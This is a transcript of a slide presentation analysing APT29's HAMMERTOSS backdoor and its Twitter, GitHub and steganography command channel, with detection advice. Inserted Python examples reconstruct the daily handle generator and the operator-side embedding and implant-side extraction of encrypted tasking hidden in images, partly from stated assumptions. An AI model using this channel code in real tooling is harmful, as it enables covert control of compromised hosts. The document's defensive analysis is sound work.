APT29 HAMMERTOSS JAYAKRISHNAN M

Upload: noah-walsh

Post on 26-Dec-2015

Page 1: APT29 HAMMERTOSS JAYAKRISHNAN M. CONTENTS What is APT? Who is APT29? Introduction to Hammertoss 5 Stages of Hammertoss Detection and Prevention Conclusion

APT29 HAMMERTOSS

JAYAKRISHNAN M

Page 2:

CONTENTS

• What is APT?
• Who is APT29?
• Introduction to Hammertoss
• 5 Stages of Hammertoss
• Detection and Prevention
• Conclusion

Page 3:

WHAT IS APT?

• Advanced: combines multiple attack methods; develops or buys zero-day exploits; high sophistication.

• Persistent: avoids detection; harvests information over a long time; "low and slow" approach.

• Threat: skilled, motivated, organized and well-funded adversaries (criminal organizations or states), not a piece of malware, an exploit or a single attack on its own.

Page 4:

WHO USES APT?

• Nations.

• Organized Crime Groups.

• Hacktivist Groups.

TARGETS

• Business Organizations.

• Political Targets.

• Nations.

Page 5:

• APT29 – Russian Advanced Persistent Threat group.

• Observed operating since at least late 2014.

• Suspected to be sponsored by the Russian government.

• Ceases operations on Russian holidays.

• Work hours aligned to the UTC+3 (Moscow) time zone.

• Disciplined and consistent.

• Uses anti-forensic techniques and monitors the victim's remediation efforts.

Page 6:

• Linked to intrusions into unclassified US government email systems: the White House and State Department in 2014, and the Pentagon Joint Staff email system in 2015.

• Was able to read some of President Barack Obama's unclassified emails.

• Led to partial shutdowns of the affected email systems.

• Used DDoS.

• Gathered a massive amount of information.

• Distributed it to thousands of Internet accounts within minutes.

Page 7:

HAMMERTOSS

• Stealthy malware.
• Discovered and reported by FireEye in 2015.
• Used as a backdoor by attackers who have already gained access to the network.
• Communication is low, slow and obfuscated.
• Very difficult to detect.
• Uses Twitter, GitHub and cloud storage services as its command and control channel.

Page 8:

VARIANTS

2 variants – both written in C#.

• UPLOADER
• tDiscoverer

Page 9:

UPLOADER

• Hard-coded server for its CnC.
• Goes to a specific page on that server.
• Obtains an image of a specific size from it.

Page 10:

TDISCOVERER

• More obfuscation than Uploader.
• Goes to a daily generated Twitter account to obtain the CnC URL.
• Acquires the target image from that URL.

Page 11:

5 STAGES OF HAMMERTOSS

1. Create the day's Twitter handle.

2. Tweet the URL to an image on GitHub.

3. Download the image containing the payload.

4. Use steganography to recover the instructions hidden in the image.

5. Execute the commands.

Page 12:

STAGE 1: COMMUNICATION BEGINS WITH TWITTER

1. Hammertoss (HT) contains an algorithm that generates a new Twitter handle each day (a handle is a user ID on Twitter).

2. HT visits the Twitter URL for that handle.

3. Two outcomes:

   A. The APT29 operator has registered the handle and tweeted instructions: HT reads the instructions from the tweet.

   B. The operator has not registered the handle: HT waits until the next day and begins the process again.

Page 13:

• ALGORITHM: uses a base name, e.g. "Bob". Prepends and appends CRC32-derived values computed from the current date. Eg: 1abBob52b
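The handle generator described above, reconstructed as an added example (this is not the page's or FireEye's code). The page gives only the shape of the algorithm (a base name, CRC32 values of the current date prepended and appended, e.g. 1abBob52b); which bytes are fed to CRC32, how three hex characters are taken from the result, and the weekday/start-date restriction are assumptions here. The same functions serve the defender: generate the handles the implant would have looked up over a date range and match them against handles seen in proxy logs.

```python
"""Date-seeded Twitter handle generator (assumed reconstruction) plus the
defensive check that matches observed handles against it."""
import zlib
from datetime import date, timedelta

BASE_NAME = "Bob"  # the page's example base name; recovered from the binary in practice


def _crc_tag(seed: bytes) -> str:
    """Three hex digits from the low 12 bits of CRC32(seed) (assumed derivation)."""
    return format(zlib.crc32(seed) & 0xFFF, "03x")


def daily_handle(day: date, base: str = BASE_NAME) -> str:
    """Handle for `day`: <crc of date><base><crc of date+base>, e.g. 1abBob52b."""
    stamp = day.strftime("%Y%m%d").encode()
    return f"{_crc_tag(stamp)}{base}{_crc_tag(stamp + base.encode())}"


def candidate_handles(start: date, days: int, base: str = BASE_NAME,
                      weekdays_only: bool = True) -> dict:
    """Handles the implant would look up from `start` for `days` days.
    The page says the operator can restrict lookups to weekdays and set a
    start date; the two parameters model that."""
    out = {}
    for i in range(days):
        day = start + timedelta(days=i)
        if weekdays_only and day.weekday() >= 5:
            continue
        out[day] = daily_handle(day, base)
    return out


def match_observed(observed: set, start: date, days: int, base: str = BASE_NAME) -> dict:
    """Defender side: given handles seen in proxy logs (the path of twitter.com
    URLs), return those the algorithm would have produced and the day each
    belongs to. Weekends are included so a less restricted build is caught too."""
    expected = candidate_handles(start, days, base, weekdays_only=False)
    return {h: d for d, h in expected.items() if h in observed}


if __name__ == "__main__":
    today = date(2015, 7, 29)
    print("today's handle:", daily_handle(today))
    seen = {daily_handle(today), "legituser"}          # constructed log extract
    print("matches:", match_observed(seen, today - timedelta(days=7), 14))
```

The defensive side only works once the base name and derivation are known, which is exactly the point the page makes later: you need the binary and a reverse-engineering pass before the candidate list can be built, and most of the candidates will never be registered.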

STAGE 1: COMMUNICATION BEGINS WITH TWITTER

Page 14:

• APT29 knows the algorithm and therefore which handle HT will look up on a given day.

• Chooses whether to register that day's handle.

• Posts obfuscated instructions to the registered handle.

• The operator can also restrict HT: check Twitter handles only on weekdays, and only after a specified start date.

STAGE 1: COMMUNICATION BEGINS WITH TWITTER

Page 15:

STAGE 2: TWEETING URL, FILE SIZE, PART OF KEY

• Once the handle is registered, the operator tweets a URL and a hashtag.

• Eg. doctorhandbook.com #101docto

URL: HT downloads the content hosted at the specified URL.

101 – Location within the image file: the hidden instructions start at byte 101 (so the image must be at least this large).

docto – Part of the decryption key.

Page 17:

STAGE 3: DOWNLOAD IMAGE FROM GITHUB

• APT29's operator registers a GitHub page and uploads the images to it.

• HT uses the Internet Explorer application COM object to visit the page and download the image, so the request looks like normal browsing and the image lands in the browser cache.

Page 19:

STAGE 4: USING STEGANOGRAPHY

• APT29 uses basic steganography.

• Steganography – the practice of concealing a message inside an image.

1. Download the image from the specified URL; HT then retrieves it from the browser cache.

• HT searches the cache for any image whose size is at least the offset specified in stage 2.

2. The image looks normal but carries encrypted commands.

3. Decryption key = hard-coded key + the characters obtained from the tweet in stage 2.

4. The decrypted data includes commands or login credentials.
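Stages 2 to 4 end to end, as an added example that is not code from the page or from FireEye: parsing the tweet, combining the hard-coded key part with the tweeted characters, selecting cached images large enough for the offset, and recovering the data appended at that offset. The tweet layout follows the page's example; the hard-coded key material, the use of SHA-256 to combine the two key parts, the XOR stream cipher standing in for whatever the real sample used, and the carrier image bytes are all assumptions made for illustration.

```python
"""Reconstruction of the HAMMERTOSS tasking channel (stages 2-4), both the
operator side (embed) and the implant side (locate and extract). Assumed
details are marked as such."""
import re
from hashlib import sha256
from itertools import cycle

# Assumed: the fixed half of the key that would be embedded in the HT binary.
HARDCODED_KEY_PART = b"hardcoded-key-part-from-binary"

# "<url> #<offset><key chars>", e.g. "doctorhandbook.com #101docto":
# 101 = byte offset where the hidden data starts, "docto" = tweeted key part.
TWEET_RE = re.compile(r"(?P<url>\S+)\s+#(?P<offset>\d+)(?P<keypart>[A-Za-z]+)")

# Constructed tasking used by demo(); the real content is operator-defined.
TASKING = b"cmd: whoami /all; upload: C:\\Users\\victim\\Documents; login: user:pass"


def parse_tweet(tweet: str) -> tuple:
    """Split a tasking tweet into (URL, offset, tweeted key part)."""
    m = TWEET_RE.search(tweet)
    if m is None:
        raise ValueError("tweet does not carry '<url> #<offset><key chars>'")
    return m["url"], int(m["offset"]), m["keypart"]


def derive_key(tweet_keypart: str) -> bytes:
    """Key = hard-coded part + characters from the tweet (hashing is assumed)."""
    return sha256(HARDCODED_KEY_PART + tweet_keypart.encode()).digest()


def _xor_stream(data: bytes, key: bytes) -> bytes:
    """Toy stream cipher standing in for the sample's real one (assumed)."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def embed_payload(image: bytes, offset: int, tweet_keypart: str, commands: bytes) -> bytes:
    """Operator side: pad the carrier up to `offset`, then append the encrypted
    tasking. Image viewers ignore bytes after the image's end marker, so the
    file still displays normally."""
    if len(image) > offset:
        raise ValueError("offset must lie at or past the end of the carrier image")
    return image.ljust(offset, b"\x00") + _xor_stream(commands, derive_key(tweet_keypart))


def candidate_images(cache: dict, offset: int) -> dict:
    """Implant side: only cached images large enough to hold data at `offset` qualify."""
    return {name: data for name, data in cache.items() if len(data) > offset}


def extract_commands(image: bytes, offset: int, tweet_keypart: str) -> bytes:
    """Implant side: decrypt everything from `offset` onward."""
    return _xor_stream(image[offset:], derive_key(tweet_keypart))


def demo() -> tuple:
    """Run both sides over constructed data; returns (url, offset, key part,
    {image name: recovered bytes}) for every cached image that qualified."""
    tweet = "doctorhandbook.com #101docto"  # the page's example tweet
    url, offset, keypart = parse_tweet(tweet)
    # Constructed carrier: PNG signature plus filler standing in for a real picture.
    carrier = b"\x89PNG\r\n\x1a\n" + b"\x00" * 56
    stego_image = embed_payload(carrier, offset, keypart, TASKING)
    # Constructed browser cache: one image too small to carry data, one that does.
    cache = {
        "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 40,
        "banner.png": stego_image,
    }
    recovered = {name: extract_commands(img, offset, keypart)
                 for name, img in candidate_images(cache, offset).items()}
    return url, offset, keypart, recovered


if __name__ == "__main__":
    print(demo())
```

Two properties worth noticing when hunting for this: the offset in the hashtag doubles as a size filter, so a cached image that is smaller than it can never be the carrier; and without the tweeted characters the hard-coded half of the key recovered from the binary is not enough to decrypt an image found on disk.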

Page 20:

STAGE 5: EXECUTING COMMANDS AND UPLOADING VICTIM DATA

• HT executes the decrypted commands (typically PowerShell) on the victim host.

• The operator creates a cloud storage account; its login credentials arrive in the decrypted data.

• HT uploads the collected victim data to that cloud storage account, and the operator retrieves it from there.

Page 21:

DETECTION AND PREVENTION - CHALLENGES

• Difficulty in identifying the Twitter accounts:

Requires access to the HT binary.

Reverse engineer it to recover the base name and the handle-generation algorithm.

HT generates hundreds of candidate handles, but the operator registers only a few.

• Distinguishing legitimate from malicious traffic: all communication goes to popular services over SSL/TLS-encrypted connections.

• Locating the payload: steganography and varying image sizes hide it, and reading it needs the decryption key, part of which appears only in the tweet.

Page 22:

DETECTION AND PREVENTION

• No current way to prevent infection outright; reduce the attack surface instead.

• Ensure the OS and all third-party applications are kept updated.

• Disable any browser plugin that is not needed.

• Detect malicious HT processes on hosts through endpoint monitoring (for example a non-browser process driving the IE COM object to fetch images).

• Investigate data exfiltration: look for uploads to cloud storage services that follow Twitter and GitHub access from the same host.
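One concrete form of the last two points, as an added example that is not from the page: a hunting heuristic that flags a host which contacts Twitter, then GitHub, then a cloud storage service in that order within a short window, run over constructed proxy log lines. It assumes the proxy records at least the destination hostname (from SNI or TLS inspection); under plain HTTPS the URL path, and with it the Twitter handle, is not visible, which is why the check keys on the sequence of hosts rather than on the handle. The cloud storage hostname is a placeholder to be replaced with the provider actually in use.

```python
"""Sequence-based hunt for the HAMMERTOSS traffic pattern over proxy logs."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: "<ISO time> <client ip> <method> <url> <status>".
# 10.1.4.22 shows the full chain; the other two clients are ordinary traffic.
SAMPLE_LOG = """\
2015-07-29T06:02:11Z 10.1.4.22 GET https://twitter.com/1abBob52b 200
2015-07-29T06:02:13Z 10.1.4.22 GET https://github.com/someuser/pics/raw/master/banner.png 200
2015-07-29T06:03:40Z 10.1.4.22 PUT https://storage.example-cloud.com/upload/a1b2 200
2015-07-29T06:05:00Z 10.1.4.22 GET https://twitter.com/1abBob52b 200
2015-07-29T09:15:02Z 10.1.4.57 GET https://github.com/org/repo/blob/master/README.md 200
2015-07-29T09:20:30Z 10.1.4.57 GET https://twitter.com/home 200
2015-07-30T12:00:00Z 10.1.4.99 PUT https://storage.example-cloud.com/upload/zz9 200
"""

# Which stage of the HT channel a destination host belongs to.
STAGE_OF_HOST = {
    "twitter.com": "twitter",
    "github.com": "github",
    "raw.githubusercontent.com": "github",
    "storage.example-cloud.com": "cloud",  # assumed placeholder for the real provider
}
# The order HT uses them: Twitter for tasking, GitHub for the image, cloud storage for exfil.
STAGE_ORDER = ("twitter", "github", "cloud")


def parse_line(line: str) -> tuple:
    """Return (timestamp, client, method, host, url) for one log line."""
    ts, client, method, url, _status = line.split()
    host = url.split("/", 3)[2]
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, method, host, url


def find_sequences(log_text: str, window: timedelta = timedelta(minutes=30)) -> dict:
    """Return {client: [urls]} for clients whose traffic contains the stages of
    STAGE_ORDER in order, starting from a Twitter request and completing
    within `window`. Other requests in between are ignored."""
    by_client = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, host, url = parse_line(line)
        stage = STAGE_OF_HOST.get(host)
        if stage:
            by_client[client].append((ts, stage, url))

    hits = {}
    for client, events in by_client.items():
        events.sort()
        for i, (t0, s0, u0) in enumerate(events):
            if s0 != STAGE_ORDER[0]:
                continue
            chain, want = [u0], 1
            for t, s, u in events[i + 1:]:
                if t - t0 > window:
                    break
                if s == STAGE_ORDER[want]:
                    chain.append(u)
                    want += 1
                    if want == len(STAGE_ORDER):
                        hits[client] = chain
                        break
            if client in hits:
                break
    return hits


if __name__ == "__main__":
    for client, chain in find_sequences(SAMPLE_LOG).items():
        print(client, "->", " | ".join(chain))
```

On a real proxy this will fire on developers and marketing staff too, which is the false-positive problem the page raises; it is a triage filter to pair with endpoint data (which process made the requests), not an alert on its own.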

Page 23:

CONCLUSION

• HT shows APT29's ability to adapt quickly to avoid detection and removal.

• A very sophisticated backdoor.

• No use of ransomware as an HT payload has been reported.

• Takedown actions are likely to be ineffective since the group is state sponsored.

• Behaviour-based analysis also struggles: the traffic (Twitter, GitHub, cloud storage over HTTPS) looks like ordinary user activity, producing a large number of false positives.

Page 24:

THANK YOU